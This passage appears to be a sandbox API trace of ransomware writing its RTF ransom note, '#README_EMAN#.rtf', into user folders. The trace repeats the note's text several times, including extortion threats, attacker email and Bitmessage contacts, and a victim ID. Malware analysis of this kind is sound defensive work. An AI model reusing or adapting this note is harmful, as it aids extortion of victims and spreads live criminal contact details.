m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.272] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.272] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.272] CloseHandle (hObject=0x2c8) returned 1 [0280.272] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0280.273] GetLastError () returned 0x2 [0280.273] CreateFileW 